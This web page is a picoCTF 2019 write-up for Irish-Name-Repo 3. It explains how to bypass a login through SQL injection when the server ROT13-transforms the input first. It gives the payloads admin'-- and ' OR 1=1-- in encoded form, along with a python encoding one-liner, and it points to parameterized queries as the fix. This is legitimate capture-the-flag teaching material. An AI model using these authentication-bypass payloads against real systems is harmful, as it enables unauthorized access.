picoCTF Solutions
picoCTF 2019Web ExploitationMedium

Irish-Name-Repo 3 picoCTF 2019 Solution

Published: April 2, 2026

Description

Even more SQL injection. This version has an extra twist - ROT13 encoding is applied to your input before the query runs.

Read the technique guide

Solution

Walk me through it
This is the third and hardest challenge in the Irish-Name-Repo series. Work through Irish-Name-Repo 1 and Irish-Name-Repo 2 first. The SQL Injection for CTF guide covers authentication bypass, including challenges where the input is encoded before injection.
  1. Step 1Discover the ROT13 encoding
    Try a standard SQL injection payload and observe that it fails. Check the page source or look for hints that the input is being transformed before use. The server applies ROT13 to your input before inserting it into the SQL query.
    Learn more

    ROT13 is a Caesar cipher that rotates each letter by 13 positions. Applying it twice returns the original text. It affects only letters - digits, spaces, and punctuation (including SQL special characters like ' and -) pass through unchanged.

    This means that SQL injection payloads containing only letters need to be ROT13-encoded before submission, while the apostrophe and dash characters still work as-is.

  2. Step 2ROT13-encode your SQL injection payload
    The payload admin'-- becomes nqzva'-- after ROT13. The apostrophe and dashes are unchanged, but 'admin' becomes 'nqzva'. Submit this as the username.
    python
    python3 -c "import codecs; print(codecs.encode('admin\'--', 'rot_13'))"
    Learn more

    After ROT13 encoding, the server decodes your input back by applying ROT13 (which reverses itself), producing admin'--, and then inserts it into the SQL query. The result is the same SQL injection that worked in part 2.

    Alternatively, ROT13 of ' OR 1=1-- is ' BE 1=1--. The letters OR become BE, but the SQL syntax characters (apostrophe, spaces, digits, dashes) are unchanged.

  3. Step 3Submit the encoded payload and get the flag
    Enter the ROT13-encoded payload as the username. The server ROT13s it back to a valid SQLi payload, executes the broken query, and returns the flag.
    Learn more

    This challenge demonstrates that simple encoding applied to input is not a security control - it does not prevent injection if the attacker knows the encoding scheme. True protection comes from using parameterized queries regardless of what transformations are applied to the input.

Flag

picoCTF{...}

ROT13-encode your SQL injection payload before submitting - the server ROT13-decodes it before placing it in the query.

Want more picoCTF 2019 writeups?

Browse picoCTF 2019Full library

Useful tools for Web Exploitation

Related reading

What to try next